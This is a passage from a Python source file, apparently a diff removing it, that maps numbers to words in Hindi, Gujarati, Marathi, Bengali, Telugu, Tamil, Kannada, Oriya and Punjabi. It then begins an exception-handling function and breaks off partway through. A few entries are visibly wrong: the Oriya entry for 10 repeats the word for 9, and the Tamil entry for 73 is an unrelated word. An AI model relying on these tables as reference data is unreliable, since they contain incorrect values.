"52": "बावन", - "53": "तिरेपन", - "54": "चौवन", - "55": "पचपन", - "56": "छप्पन", - "57": "सत्तावन", - "58": "अट्ठावन", - "59": "उनसठ", - "60": "साठ", - "61": "इकसठ", - "62": "बासठ", - "63": "तिरेसठ", - "64": "चौंसठ", - "65": "पैंसठ", - "66": "छयासठ", - "67": "सरसठ​", - "68": "अड़सठ", - "69": "उनहत्तर", - "70": "सत्तर", - "71": "इकहत्तर", - "72": "बहत्तर", - "73": "तिहत्तर", - "74": "चौहत्तर", - "75": "पचहत्तर", - "76": "छिहत्तर", - "77": "सतहत्तर", - "78": "अठहत्तर", - "79": "उन्यासी", - "80": "अस्सी", - "81": "इक्यासी", - "82": "बयासी", - "83": "तिरासी", - "84": "चौरासी", - "85": "पचासी", - "86": "छियासी", - "87": "सत्तासी", - "88": "अठासी", - "89": "नवासी", - "90": "नब्बे", - "91": "इक्यानवे", - "92": "बानवे", - "93": "तिरानवे", - "94": "चौरानवे", - "95": "पचानवे", - "96": "छियानवे", - "97": "सत्तानवे", - "98": "अट्ठानवे", - "99": "निन्यानवे", - "100": "सौ", - "1000": "हज़ार", - "100000": "लाख", - "10000000": "करोड़", - "1000000000": "अरब", -} # Hindi -num_dict["gu"] = { - "0": "શૂન્ય", - "1": "એક", - "2": "બે", - "3": "ત્રણ", - "4": "ચાર", - "5": "પાંચ", - "6": "છ", - "7": "સાત", - "8": "આઠ", - "9": "નવ", - "10": "દસ", - "11": "અગિયાર", - "12": "બાર", - "13": "તેર", - "14": "ચૌદ", - "15": "પંદર", - "16": "સોળ", - "17": "સત્તર", - "18": "અઢાર", - "19": "ઓગણિસ", - "20": "વીસ", - "21": "એકવીસ", - "22": "બાવીસ", - "23": "તેવીસ", - "24": "ચોવીસ", - "25": "પચ્ચીસ", - "26": "છવીસ", - "27": "સત્તાવીસ", - "28": "અઠ્ઠાવીસ", - "29": "ઓગણત્રીસ", - "30": "ત્રીસ", - "31": "એકત્રીસ", - "32": "બત્રીસ", - "33": "તેત્રીસ", - "34": "ચોત્રીસ", - "35": "પાંત્રીસ", - "36": "છત્રીસ", - "37": "સડત્રીસ", - "38": "અડત્રીસ", - "39": "ઓગણચાલીસ", - "40": "ચાલીસ", - "41": "એકતાલીસ", - "42": "બેતાલીસ", - "43": "ત્રેતાલીસ", - "44": "ચુંમાલીસ", - "45": "પિસ્તાલીસ", - "46": "છેતાલીસ", - "47": "સુડતાલીસ", - "48": "અડતાલીસ", - "49": "ઓગણપચાસ", - "50": "પચાસ", - "51": "એકાવન", - "52": "બાવન", - "53": "ત્રેપન", - "54": "ચોપન", - "55": "પંચાવન", - "56": "છપ્પન", - "57": "સત્તાવન", - "58": "અઠ્ઠાવન", - "59": "ઓગણસાઠ", - "60": "સાઈઠ", - "61": "એકસઠ", - "62": "બાસઠ", - "63": "ત્રેસઠ", - "64": "ચોસઠ", - "65": "પાંસઠ", - "66": "છાસઠ", - "67": "સડસઠ", - "68": "અડસઠ", - "69": "અગણોસિત્તેર", - "70": "સિત્તેર", - "71": "એકોતેર", - "72": "બોતેર", - "73": "તોતેર", - "74": "ચુમોતેર", - "75": "પંચોતેર", - "76": "છોતેર", - "77": "સિત્યોતેર", - "78": "ઇઠ્યોતેર", - "79": "ઓગણાએંસી", - "80": "એંસી", - "81": "એક્યાસી", - "82": "બ્યાસી", - "83": "ત્યાસી", - "84": "ચોર્યાસી", - "85": "પંચાસી", - "86": "છ્યાસી", - "87": "સિત્યાસી", - "88": "ઈઠ્યાસી", - "89": "નેવ્યાસી", - "90": "નેવું", - "91": "એકાણું", - "92": "બાણું", - "93": "ત્રાણું", - "94": "ચોરાણું", - "95": "પંચાણું", - "96": "છન્નું", - "97": "સત્તાણું", - "98": "અઠ્ઠાણું", - "99": "નવ્વાણું", - "100": "સો", - "1000": "હજાર", - "100000": "લાખ", - "1000000": "દસ લાખ", - "10000000": "કરોડ઼", -} # Gujarati -num_dict["mr"] = { - "0": "शून्य", - "1": "एक", - "2": "दोन", - "3": "तीन", - "4": "चार", - "5": "पाच", - "6": "सहा", - "7": "सात", - "8": "आठ", - "9": "नऊ", - "10": "दहा", - "11": "अकरा", - "12": "बारा", - "13": "तेरा", - "14": "चौदा", - "15": "पंधरा", - "16": "सोळा", - "17": "सतरा", - "18": "अठरा", - "19": "एकोणीस", - "20": "वीस", - "21": "एकवीस", - "22": "बावीस", - "23": "तेवीस", - "24": "चोवीस", - "25": "पंचवीस", - "26": "सव्वीस", - "27": "सत्तावीस", - "28": "अठ्ठावीस", - "29": "एकोणतीस", - "30": "तीस", - "31": "एकतीस", - "32": "बत्तीस", - "33": "तेहेतीस", - "34": "चौतीस", - "35": "पस्तीस", - "36": "छत्तीस", - "37": "सदतीस", - "38": "अडतीस", - "39": "एकोणचाळीस", - "40": "चाळीस", - "41": "एक्केचाळीस", - "42": "बेचाळीस", - "43": "त्रेचाळीस", - "44": "चव्वेचाळीस", - "45": "पंचेचाळीस", - "46": "सेहेचाळीस", - "47": "सत्तेचाळीस", - "48": "अठ्ठेचाळीस", - "49": "एकोणपन्नास", - "50": "पन्नास", - "51": "एक्कावन्न", - "52": "बावन्न", - "53": "त्रेपन्न", - "54": "चोपन्न", - "55": "पंचावन्न", - "56": "छप्पन्न", - "57": "सत्तावन्न", - "58": "अठ्ठावन्न", - "59": "एकोणसाठ", - "60": "साठ", - "61": "एकसष्ठ", - "62": "बासष्ठ", - "63": "त्रेसष्ठ", - "64": "चौसष्ठ", - "65": "पासष्ठ", - "66": "सहासष्ठ", - "67": "सदुसष्ठ", - "68": "अडुसष्ठ", - "69": "एकोणसत्तर", - "70": "सत्तर", - "71": "एक्काहत्तर", - "72": "बाहत्तर", - "73": "त्र्याहत्तर", - "74": "चौर्‍याहत्तर", - "75": "पंच्याहत्तर", - "76": "शहात्तर", - "77": "सत्याहत्तर", - "78": "अठ्ठ्याहत्तर", - "79": "एकोण ऐंशी", - "80": "ऐंशी", - "81": "एक्क्याऐंशी", - "82": "ब्याऐंशी", - "83": "त्र्याऐंशी", - "84": "चौऱ्याऐंशी", - "85": "पंच्याऐंशी", - "86": "शहाऐंशी", - "87": "सत्त्याऐंशी", - "88": "अठ्ठ्याऐंशी", - "89": "एकोणनव्वद", - "90": "नव्वद", - "91": "एक्क्याण्णव", - "92": "ब्याण्णव", - "93": "त्र्याण्णव", - "94": "चौऱ्याण्णव", - "95": "पंच्याण्णव", - "96": "शहाण्णव", - "97": "सत्त्याण्णव", - "98": "अठ्ठ्याण्णव", - "99": "नव्व्याण्णव", - "100": "शे", - "1000": "हजार", - "100000": "लाख", - "10000000": "कोटी", - "1000000000": "अब्ज", -} # Marathi -num_dict["bn"] = { - "0": "শূন্য", - "1": "এক", - "2": "দুই", - "3": "তিন", - "4": "চার", - "5": "পাঁচ", - "6": "ছয়", - "7": "সাত", - "8": "আট", - "9": "নয়", - "10": "দশ", - "11": "এগার", - "12": "বার", - "13": "তের", - "14": "চৌদ্দ", - "15": "পনের", - "16": "ষোল", - "17": "সতের", - "18": "আঠার", - "19": "ঊনিশ", - "20": "বিশ", - "21": "একুশ", - "22": "বাইশ", - "23": "তেইশ", - "24": "চব্বিশ", - "25": "পঁচিশ", - "26": "ছাব্বিশ", - "27": "সাতাশ", - "28": "আঠাশ", - "29": "ঊনত্রিশ", - "30": "ত্রিশ", - "31": "একত্রিশ", - "32": "বত্রিশ", - "33": "তেত্রিশ", - "34": "চৌত্রিশ", - "35": "পঁয়ত্রিশ", - "36": "ছত্রিশ", - "37": "সাঁইত্রিশ", - "38": "আটত্রিশ", - "39": "ঊনচল্লিশ", - "40": "চল্লিশ", - "41": "একচল্লিশ", - "42": "বিয়াল্লিশ", - "43": "তেতাল্লিশ", - "44": "চুয়াল্লিশ", - "45": "পঁয়তাল্লিশ", - "46": "ছেচল্লিশ", - "47": "সাতচল্লিশ", - "48": "আটচল্লিশ", - "49": "ঊনপঞ্চাশ", - "50": "পঞ্চাশ", - "51": "একান্ন", - "52": "বায়ান্ন", - "53": "তিপ্পান্ন", - "54": "চুয়ান্ন", - "55": "পঞ্চান্ন", - "56": "ছাপ্পান্ন", - "57": "সাতান্ন", - "58": "আটান্ন", - "59": "ঊনষাট", - "60": "ষাট", - "61": "একষট্টি", - "62": "বাষট্টি", - "63": "তেষট্টি", - "64": "চৌষট্টি", - "65": "পঁয়ষট্টি", - "66": "ছেষট্টি", - "67": "সাতষট্টি", - "68": "আটষট্টি", - "69": "ঊনসত্তর", - "70": "সত্তর", - "71": "একাত্তর", - "72": "বাহাত্তর", - "73": "তিয়াত্তর", - "74": "চুয়াত্তর", - "75": "পঁচাত্তর", - "76": "ছিয়াত্তর", - "77": "সাতাত্তর", - "78": "আটাত্তর", - "79": "ঊনআশি", - "80": "আশি", - "81": "একাশি", - "82": "বিরাশি", - "83": "তিরাশি", - "84": "চুরাশি", - "85": "পঁচাশি", - "86": "ছিয়াশি", - "87": "সাতাশি", - "88": "আটাশি", - "89": "ঊননব্বই", - "90": "নব্বই", - "91": "একানব্বই", - "92": "বিরানব্বই", - "93": "তিরানব্বই", - "94": "চুরানব্বই", - "95": "পঁচানব্বই", - "96": "ছিয়ানব্বই", - "97": "সাতানব্বই", - "98": "আটানব্বই", - "99": "নিরানব্বই", - "100": "শো", - "1000": "হাজার", - "100000": "লাখ", - "10000000": "কোটি", - "1000000000": "একশ’ কোটি", -} # Bengali -num_dict["te"] = { - "0": "సున్నా", - "1": "ఒకటి", - "2": "రెండు", - "3": "మూడు", - "4": "నాలుగు", - "5": "ఐదు", - "6": "ఆరు", - "7": "ఏడు", - "8": "ఎనిమిది", - "9": "తొమ్మిది", - "10": "పది", - "11": "పదకొండు", - "12": "పన్నెండు", - "13": "పదమూడు", - "14": "పద్నాలుగు", - "15": "పదిహేను", - "16": "పదహారు", - "17": "పదిహేడు", - "18": "పద్దెనిమిది", - "19": "పందొమ్మిది", - "20": "ఇరవై", - "21": "ఇరవై ఒకటి", - "22": "ఇరవై రెండు", - "23": "ఇరవై మూడు", - "24": "ఇరవై నాలుగు", - "25": "ఇరవై ఐదు", - "26": "ఇరవై ఆరు", - "27": "ఇరవై ఏడు", - "28": "ఇరవై ఎనిమిది", - "29": "ఇరవై తొమ్మిది", - "30": "ముప్పై", - "31": "ముప్పై ఒకటి", - "32": "ముప్పై రెండు", - "33": "ముప్పై మూడు", - "34": "ముప్పై నాలుగు", - "35": "ముప్పై ఐదు", - "36": "ముప్పై ఆరు", - "37": "ముప్పై ఏడు", - "38": "ముప్పై ఎనిమిది", - "39": "ముప్పై తొమ్మిది", - "40": "నలభై", - "41": "నలభై ఒకటి", - "42": "నలభై రెండు", - "43": "నలభై మూడు", - "44": "నలభై నాలుగు", - "45": "నలభై ఐదు", - "46": "నలభై ఆరు", - "47": "నలభై ఏడు", - "48": "నలభై ఎనిమిది", - "49": "నలభై తొమ్మిది", - "50": "యాభై", - "51": "యాభై ఒకటి", - "52": "యాభై రెండు", - "53": "యాభై మూడు", - "54": "యాభై నాలుగు", - "55": "యాభై ఐదు", - "56": "యాభై ఆరు", - "57": "యాభై ఏడు", - "58": "యాభై ఎనిమిది", - "59": "యాభై తొమ్మిది", - "60": "అరవై", - "61": "అరవై ఒకటి", - "62": "అరవై రెండు", - "63": "అరవై మూడు", - "64": "అరవై నాలుగు", - "65": "అరవై ఐదు", - "66": "అరవై ఆరు", - "67": "అరవై ఏడు", - "68": "అరవై ఎనిమిది", - "69": "అరవై తొమ్మిది", - "70": "డెబ్బై", - "71": "డెబ్బై ఒకటి", - "72": "డెబ్బై రెండు", - "73": "డెబ్బై మూడు", - "74": "డెబ్బై నాలుగు", - "75": "డెబ్బై ఐదు", - "76": "డెబ్బై ఆరు", - "77": "డెబ్బై ఏడు", - "78": "డెబ్బై ఎనిమిది", - "79": "డెబ్బై తొమ్మిది", - "80": "ఎనభై", - "81": "ఎనభై ఒకటి", - "82": "ఎనభై రెండు", - "83": "ఎనభై మూడు", - "84": "ఎనభై నాలుగు", - "85": "ఎనభై ఐదు", - "86": "ఎనభై ఆరు", - "87": "ఎనభై ఏడు", - "88": "ఎనభై ఎనిమిది", - "89": "ఎనభై తొమ్మిది", - "90": "తొంభై", - "91": "తొంభై ఒకటి", - "92": "తొంభై రెండు", - "93": "తొంభై మూడు", - "94": "తొంభై నాలుగు", - "95": "తొంభై ఐదు", - "96": "తొంభై ఆరు", - "97": "తొంభై ఏడు", - "98": "తొంభై ఎనిమిది", - "99": "తొంభై తొమ్మిది", - "100": "వందల", - "1000": "వేల", - "100000": "లక్షల", - "10000000": "కోట్ల", - "1000000000": "బిలియన్", -} # Telugu -num_dict["ta"] = { - "0": "பூஜ்ஜியம்", - "1": "ஒன்று", - "2": "இரண்டு", - "3": "மூன்று", - "4": "நான்கு", - "5": "ஐந்து", - "6": "ஆறு", - "7": "ஏழு", - "8": "எட்டு", - "9": "ஒன்பது", - "10": "பத்து", - "11": "பதினொன்று", - "12": "பன்னிரண்டு", - "13": "பதிமூன்று", - "14": "பதினான்கு", - "15": "பதினைந்து", - "16": "பதினாறு", - "17": "பதினேழு", - "18": "பதினெட்டு", - "19": "பத்தொன்பது", - "20": "இருபது", - "21": "இருபது ஒன்று", - "22": "இருபத்து இரண்டு", - "23": "இருபத்து மூன்று", - "24": "இருபத்து நான்கு", - "25": "இருபத்து ஐந்து", - "26": "இருபத்து ஆறு", - "27": "இருபத்து ஏழு", - "28": "இருபத்து எட்டு", - "29": "இருபத்து ஒன்பது", - "30": "முப்பது", - "31": "முப்பத்து ஒன்று", - "32": "முப்பத்து இரண்டு", - "33": "முப்பத்து மூன்று", - "34": "முப்பத்து நான்கு", - "35": "முப்பத்து ஐந்து", - "36": "முப்பத்து ஆறு", - "37": "முப்பத்து ஏழு", - "38": "முப்பத்து எட்டு", - "39": "முப்பத்து ஒன்பது", - "40": "நாற்பது", - "41": "நாற்பத்து ஒன்று", - "42": "நாற்பத்து இரண்டு", - "43": "நாற்பத்து மூன்று", - "44": "நாற்பத்து நான்கு", - "45": "நாற்பத்து ஐந்து", - "46": "நாற்பத்து ஆறு", - "47": " நாற்பத்து ஏழு", - "48": "நாற்பத்து எட்டு", - "49": "நாற்பத்து ஒன்பது", - "50": "ஐம்பது", - "51": "ஐம்பத்து ஒன்று", - "52": "ஐம்பத்து இரண்டு", - "53": "ஐம்பத்து மூன்று", - "54": "ஐம்பத்து நான்கு", - "55": "ஐம்பத்து ஐந்து", - "56": "ஐம்பத்து ஆறு", - "57": "ஐம்பத்து ஏழு", - "58": "ஐம்பத்து எட்டு", - "59": "ஐம்பத்து ஒன்பது", - "60": "அறுபது", - "61": "அறுபத்து ஒன்று", - "62": "அறுபத்து இரண்டு", - "63": "அறுபத்து மூன்று", - "64": "அறுபத்து நான்கு", - "65": "அறுபத்து ஐந்து", - "66": "அறுபத்து ஆறு", - "67": "அறுபத்து ஏழு", - "68": "அறுபத்து எட்டு", - "69": "அறுபத்து ஒன்பது", - "70": "எழுபது", - "71": "எழுபத்தி ஒன்று", - "72": "எழுபத்தி இரண்டு", - "73": "எழுபத்தி முச்சக்கர", - "74": "எழுபத்தி நான்கு", - "75": "எழுபத்தி ஐந்து", - "76": "எழுபத்தி ஆறு", - "77": "எழுபத்தி ஏழு", - "78": "எழுபத்தி எட்டு", - "79": "எழுபத்தி ஒன்பது", - "80": "எண்பது", - "81": "எண்பத்தியொன்று", - "82": "எண்பத்திரண்டு", - "83": "எண்பத்திமூன்று", - "84": "என்பதினான்கு", - "85": "என்பதினைந்து", - "86": "எண்பத்திஆறு", - "87": "எண்பத்திஏழு", - "88": "எண்பத்தியெட்டு", - "89": "எண்பத்தியொன்பது", - "90": "தொன்னூறு", - "91": "தொண்ணூற்றியொன்று", - "92": "தொண்ணூற்றிரண்டு", - "93": "தொண்ணூற்றிமூன்று", - "94": "தொண்ணூற்றிநான்கு", - "95": "தொண்ணூற்றிஐந்து", - "96": "தொண்ணூற்றியாறு", - "97": "தொண்ணூற்றியேழு", - "98": "தொண்ணூற்றியெட்டு", - "99": "தொண்ணூற்றிஒன்பது", - "100": "நூறு", - "1000": "ஆயிரம்", - "100000": "இலட்சம்", - "10000000": "கோடி", - "1000000000": "பில்லியன்", -} # Tamil -num_dict["kn"] = { - "0": "ಸೊನ್ನೆ", - "1": "ಒಂದು", - "2": "ಎರಡು", - "3": "ಮೂರು", - "4": "ನಾಲ್ಕು", - "5": "ಅಯ್ದು", - "6": "ಆರು", - "7": "ಏಳು", - "8": "ಎಂಟು", - "9": "ಒಂಬತ್ತು", - "10": "ಹತ್ತು", - "11": "ಹನ್ನೊಂದು", - "12": "ಹನ್ನೆರಡು", - "13": "ಹದಿಮೂರು", - "14": "ಹದಿನಾಲ್ಕು", - "15": "ಹದಿನೈದು", - "16": "ಹದಿನಾರು", - "17": "ಹದಿನೇಳು", - "18": "ಹದಿನೆಂಟು", - "19": "ಹತ್ತೊಂಬತ್ತು", - "20": "ಇಪ್ಪತ್ತು", - "21": "ಇಪ್ಪತ್ತ್’ಒಂದು", - "22": "ಇಪ್ಪತ್ತ್’ಎರಡು", - "23": "ಇಪ್ಪತ್ತ್’ಮೂರು", - "24": "ಇಪ್ಪತ್ತ್’ನಾಲ್ಕು", - "25": "ಇಪ್ಪತ್ತ್’ಐದು", - "26": "ಇಪ್ಪತ್ತ್’ಆರು", - "27": "ಇಪ್ಪತ್ತ್’ಏಳು", - "28": "ಇಪ್ಪತ್ತ್’ಎಂಟು", - "29": "ಇಪ್ಪತ್ತ್’ಒಂಬತ್ತು", - "30": "ಮೂವತ್ತು", - "31": "ಮುವತ್ತ್’ಒಂದು", - "32": "ಮುವತ್ತ್’ಎರಡು", - "33": "ಮುವತ್ತ್’ಮೂರು", - "34": "ಮೂವತ್ತ್’ನಾಲ್ಕು", - "35": "ಮೂವತ್ತ್’ಐದು", - "36": "ಮೂವತ್ತ್’ಆರು", - "37": "ಮೂವತ್ತ್’ಏಳು", - "38": "ಮೂವತ್ತ್’ಎಂಟು", - "39": "ಮೂವತ್ತ್’ಒಂಬತ್ತು", - "40": "ನಲವತ್ತು", - "41": "ನಲವತ್ತೊಂದು", - "42": "ನಲವತ್ತ್ ಎರಡು", - "43": "ನಲವತ್ತ್ ಮೂರು", - "44": "ನಲವತ್ತ್ ನಾಲ್ಕು", - "45": "ನಲವತ್ತೈದು", - "46": "ನಲವತ್ತಾರು", - "47": "ನಲವತ್ತೇಳು", - "48": "ನಲವತ್ತೆಂಟು", - "49": "ನಲವತ್ತೊಂಬತ್ತು", - "50": "ಐವತ್ತು", - "51": "ಐವತ್ತೊಂದು", - "52": "ಐವತ್ತೆರಡು", - "53": "ಐವತ್ತಮೂರು", - "54": "ಐವತ್ತ್ನಾಲ್ಕು", - "55": "ಐವತ್ತೈದು", - "56": "ಐವತ್ತಾರು", - "57": "ಐವತ್ತೇಳು", - "58": "ಐವತ್ತೆಂಟು", - "59": "ಐವತ್ತೊಂಬತ್ತು", - "60": "ಅರವತ್ತು", - "61": "ಅರವತ್ತೊಂದು", - "62": "ಅರವತ್ತೆರಡು", - "63": "ಅರವತ್ತ್ ಮೂರು", - "64": "ಅರವತ್ತ್ ನಾಲ್ಕು", - "65": "ಅರವತ್ತೈದು", - "66": "ಅರವತ್ತಾರು", - "67": "ಅರವತ್ತೇಳು", - "68": "ಅರವತ್ತೆಂಟು", - "69": "ಅರವತ್ತೊಂಬತ್ತು", - "70": "ಎಪ್ಪತ್ತು", - "71": "ಎಪ್ಪತ್ತೊಂದು", - "72": "ಎಪ್ಪತ್ತೆರಡು", - "73": "ಎಪ್ಪತ್ತ್ ಮೂರು", - "74": "ಎಪ್ಪತ್ತ್ ನಾಲ್ಕು", - "75": "ಎಪ್ಪತ್ತೈದು", - "76": "ಎಪ್ಪತ್ತಾರು", - "77": "ಎಪ್ಪತ್ತೇಳು", - "78": "ಎಪ್ಪತ್ತೆಂಟು", - "79": "ಎಪ್ಪತ್ತೊಂಬತ್ತು", - "80": "ಎಂಬತ್ತು", - "81": "ಎಂಬತ್ತೊಂದು", - "82": "ಎಂಬತ್ತೆರಡು", - "83": "ಎಂಬತ್ತ್ ಮೂರು", - "84": "ಎಂಬತ್ತ್ ನಾಲ್ಕು", - "85": "ಎಂಬತ್ತೈದು", - "86": "ಎಂಬತ್ತಾರು", - "87": "ಎಂಬತ್ತೇಳು", - "88": "ಎಂಬತ್ತೆಂಟು", - "89": "ಎಂಬತ್ತೊಂಬತ್ತು", - "90": "ತೊಂಬತ್ತು", - "91": "ತೊಂಬತ್ತೊಂದು", - "92": "ತೊಂಬತ್ತೆರಡು", - "93": "ತೊಂಬತ್ತ ಮೂರು", - "94": "ತೊಂಬತ್ತ ನಾಲ್ಕು", - "95": "ತೊಂಬತ್ತೈದು", - "96": "ತೊಂಬತ್ತಾರು", - "97": "ತೊಂಬತ್ತೇಳು", - "98": "ತೊಂಬತ್ತೆಂಟು", - "99": "ತೊಂಬತ್ತೊಂಬತ್ತು", - "100": "ನೂರ", - "1000": "ಸಾವಿರದ", - "100000": "ಲಕ್ಷದ", - "10000000": "ಕೋಟಿ", - "1000000000": "ಶತಕೋಟಿ", -} # Kannada -num_dict["or"] = { - "0": "ଶୁନ୍ୟ", - "1": "ଏକ", - "2": "ଦୁଇ", - "3": "ତିନି", - "4": "ଚାରି", - "5": "ପାଞ୍ଚ", - "6": "ଛଅ", - "7": "ସାତ", - "8": "ଆଠ", - "9": "ନଅ", - "10": "ନଅ", - "11": "ଏଗାର", - "12": "ବାର", - "13": "ତେର", - "14": "ଚଉଦ", - "15": "ପନ୍ଦର", - "16": "ଷୋହଳ", - "17": "ସତର", - "18": "ଅଠର", - "19": "ଊଣାଇଶ", - "20": "କୋଡିଏ", - "21": "ଏକୋଇଶି", - "22": "ବାଇଶି", - "23": "ତେଇଶି", - "24": "ଚବିଶି", - "25": "ପଚିଶି", - "26": "ଛବିଶି", - "27": "ସତାଇଶି", - "28": "ଅଠାଇଶି", - "29": "ଅଣତିରିଶି", - "30": "ତିରିଶି", - "31": "ଏକତିରିଶି", - "32": "ବତିଶି", - "33": "ତେତିଶି", - "34": "ଚଉତିରିଶି", - "35": "ପଞ୍ଚତିରିଶି", - "36": "ଛତିଶି", - "37": "ସଂଇତିରିଶି", - "38": "ଅଠତିରିଶି", - "39": "ଅଣଚାଳିଶି", - "40": "ଚାଳିଶି", - "41": "ଏକଚାଳିଶି", - "42": "ବୟାଳିଶି", - "43": "ତେୟାଳିଶି", - "44": "ଚଉରାଳିଶି", - "45": "ପଞ୍ଚଚାଳିଶି", - "46": "ଛୟାଳିଶି", - "47": "ସତଚାଳିଶି", - "48": "ଅଠଚାଳିଶି", - "49": "ଅଣଚାଶ", - "50": "ପଚାଶ", - "51": "ଏକାବନ", - "52": "ବାଉନ", - "53": "ତେପନ", - "54": "ଚଉବନ", - "55": "ପଞ୍ଚାବନ", - "56": "ଛପନ", - "57": "ସତାବନ", - "58": "ଅଠାବନ", - "59": "ଅଣଷଠି", - "60": "ଷାଠିଏ", - "61": "ଏକଷଠି", - "62": "ବାଷଠି", - "63": "ତେଷଠି", - "64": "ଚଉଷଠି", - "65": "ପଞ୍ଚଷଠି", - "66": "ଛଅଷଠି", - "67": "ସତଷଠି", - "68": "ଅଠଷଠି", - "69": "ଅଣସ୍ତରୀ", - "70": "ସତୂରୀ", - "71": "ଏକସ୍ତରୀ", - "72": "ବାସ୍ତରୀ", - "73": "ତେସ୍ତରୀ", - "74": "ଚଉସ୍ତରୀ", - "75": "ପଞ୍ଚସ୍ତରୀ", - "76": "ଛଅସ୍ତରୀ", - "77": "ସତସ୍ତରୀ", - "78": "ଅଠସ୍ତରୀ", - "79": "ଅଣାଅଶୀ", - "80": "ଅଶୀ", - "81": "ଏକାଅଶୀ", - "82": "ବୟାଅଶୀ", - "83": "ତେୟାଅଶୀ", - "84": "ଚଉରାଅଶୀ", - "85": "ପଞ୍ଚାଅଶୀ", - "86": "ଛୟାଅଶୀ", - "87": "ସତାଅଶୀ", - "88": "ଅଠାଅଶୀ", - "89": "ଅଣାନବେ", - "90": "ନବେ", - "91": "ଏକାନବେ", - "92": "ବୟାନବେ", - "93": "ତେୟାନବେ", - "94": "ଚଉରାନବେ", - "95": "ପଞ୍ଚାନବେ", - "96": "ଛୟାନବେ", - "97": "ସତାନବେ", - "98": "ଅଠାନବେ", - "99": "ଅନେଶତ", - "100": "ଶହେ", - "1000": "ହଜାର", - "100000": "ଲକ୍ଷ", - "10000000": "କୋଟି", - "1000000000": "କୋଟି", -} # Oriya -num_dict["pa"] = { - "0": "ਸਿਫਰ ", - "1": "ਇੱਕ", - "2": "ਦੋ", - "3": "ਤਿੰਨ", - "4": "ਚਾਰ", - "5": "ਪੰਜ", - "6": "ਛੇ", - "7": "ਸੱਤ", - "8": "ਅੱਠ", - "9": "ਨੌਂ", - "10": "ਦੱਸ", - "11": "ਗਿਆਰਾਂ", - "12": "ਬਾਰਾਂ", - "13": "ਤੇਰਾਂ", - "14": "ਚੌਦਾਂ", - "15": "ਪੰਦਰਾਂ", - "16": "ਸੋਲ਼ਾਂ", - "17": "ਸਤਾਰਾਂ", - "18": "ਅਠਾਰਾਂ", - "19": "ਉਨੀ", - "20": "ਵੀਹ", - "21": "ਇੱਕੀ", - "22": "ਬਾਈ", - "23": "ਤੇਈ", - "24": "ਚੌਵੀ", - "25": "ਪੰਝੀ", - "26": "ਛੱਬੀ", - "27": "ਸਤਾਈ", - "28": "ਅਠਾਈ", - "29": "ਉਨੱਤੀ", - "30": "ਤੀਹ", - "31": "ਇਕੱਤੀ", - "32": "ਬੱਤੀ", - "33": "ਤੇਤੀ", - "34": "ਚੌਂਤੀ", - "35": "ਪੈਂਤੀ", - "36": "ਛੱਤੀ", - "37": "ਸੈਂਤੀ", - "38": "ਅਠੱਤੀ", - "39": "ਉਨਤਾਲੀ", - "40": "ਚਾਲੀ", - "41": "ਇਕਤਾਲੀ", - "42": "ਬਤਾਲੀ", - "43": "ਤਰਤਾਲੀ", - "44": "ਚੌਤਾਲੀ", - "45": "ਪੰਜਤਾਲੀ", - "46": "ਛਿਆਲੀ", - "47": "ਸੰਤਾਲੀ", - "48": "ਅੱਠਤਾਲੀ", - "49": "ਉਣਿੰਜਾ", - "50": "ਪੰਜਾਹ", - "51": "ਇਕਵਿੰਜਾ", - "52": "ਬਵਿੰਜਾ", - "53": "ਤਰਵਿੰਜਾ", - "54": "ਚਰਿੰਜਾ", - "55": "ਪਚਵਿੰਜਾ", - "56": "ਛਪਿੰਜਾ", - "57": "ਸਤਵਿੰਜਾ", - "58": "ਅੱਠਵਿੰਜਾ", - "59": "ਉਣਾਠ", - "60": "ਸੱਠ", - "61": "ਇਕਾਠ", - "62": "ਬਾਠ੍ਹ", - "63": "ਤਰੇਠ੍ਹ", - "64": "ਚੌਠ੍ਹ", - "65": "ਪੈਂਠ", - "66": "ਛਿਆਠ", - "67": "ਸਤਾਹਠ", - "68": "ਅੱਠਾਠ", - "69": "ਉਣੱਤਰ", - "70": "ਸੱਤਰ", - "71": "ਇਕ੍ਹੱਤਰ", - "72": "ਬਹੱਤਰ", - "73": "ਤਹੱਤਰ", - "74": "ਚੌਹੱਤਰ", - "75": "ਪੰਜੱਤਰ", - "76": "ਛਿਹੱਤਰ", - "77": "ਸਤੱਤਰ", - "78": "ਅਠੱਤਰ", - "79": "ਉਣਾਸੀ", - "80": "ਅੱਸੀ", - "81": "ਇਕਾਸੀ", - "82": "ਬਿਆਸੀ", - "83": "ਤਰਾਸੀ", - "84": "ਚਰਾਸੀ", - "85": "ਪੰਜਾਸੀ", - "86": "ਛਿਆਸੀ", - "87": "ਸਤਾਸੀ", - "88": "ਅਠਾਸੀ", - "89": "ਉਣਾਨਵੇਂ", - "90": "ਨੱਬੇ", - "91": "ਇਕਾਨਵੇਂ", - "92": "ਬਿਆਨਵੇਂ", - "93": "ਤਰਾਨਵੇਂ", - "94": "ਚਰਾਨਵੇਂ", - "95": "ਪਚਾਨਵੇਂ", - "96": "ਛਿਆਨਵੇਂ", - "97": "ਸਤਾਨਵੇਂ", - "98": "ਅਠਾਨਵੇਂ", - "99": "ਨਿੜਾਨਵੇਂ", - "100": "ਸੌ", - "1000": "ਹਜਾਰ", - "100000": "ਲੱਖ", - "10000000": "ਕਰੋੜ", - "1000000000": "ਅਰਬ", -} # Punjabi - -# --------------------------- num_to_word.py ------------------------------ -""" -Method to convert Numbers to Words -for indian languages - -Use cases:- -1) Speech recognition pre-processing -2) Language modeling Data pre-processing - -------------------------- -check indic_numbers.py to add support -for any indian language -""" - - -def language_specific_exception(words, lang, combiner): - """ - Language Specific Exception will come here - """ - - def occurs_at_end(piece): - return words[-len(piece) :] == piece - - if lang == "mr": - words = words.replace("एक" + combiner + "शे", "शंभर") - elif lang == "gu": - words = words.replace("બે" + combiner + "સો", "બસ્સો") - elif lang == "te": - exception_dict = { - "1": "ఒక", - "100": "వంద", - "100+": "వందలు", - "1000": "వెయ్యి", - "1000+": "వేలు", - "100000": "లక్ష", - "100000+": "లక్షలు", - "10000000": "కోటి", - "10000000+": "కోట్లు", - } - - test_case = ["100", "1000", "100000", "10000000"] - for test in test_case: - test_word = num_dict["te"][test] - match = num_dict["te"]["1"] + combiner + test_word - # for numbers like : 100, 1000, 100000 - if words == match: - return exception_dict[test] - # for numbers like : 200, 4000, 800000 - elif occurs_at_end(test_word): - words = words.replace(test_word, exception_dict[test + "+"]) - # for numbers like : 105, 1076, 123993 - elif not occurs_at_end(match): - replacement = exception_dict["1"] + combiner + exception_dict[test] - words = words.replace(match, replacement) - - # Exception case for 101...199 - special_case = "ఒక" + combiner + "వంద" - words = words.replace(special_case, "నూట") - elif lang == "kn": - # special case for 100 - if words == ("ಒಂದು" + combiner + 